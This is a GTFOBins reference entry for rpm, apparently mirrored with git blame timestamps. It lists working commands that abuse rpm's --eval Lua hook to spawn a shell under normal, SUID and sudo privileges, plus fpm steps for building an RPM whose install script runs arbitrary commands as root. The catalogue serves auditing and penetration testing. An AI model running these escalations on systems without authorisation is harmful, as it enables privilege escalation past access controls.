1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00
GTFOBins.github.io/_gtfobins/rpm.md

19 lines
593 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-07-16 15:01:50 +02:00
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
2018-10-05 19:55:38 +02:00
suid:
2018-07-16 15:01:50 +02:00
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
2018-10-05 19:55:38 +02:00
sudo:
2018-07-16 15:01:50 +02:00
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
- description: |
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
```
TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
```
code: |
sudo rpm -ivh x-1.0-1.noarch.rpm
2018-05-25 01:10:39 +02:00
---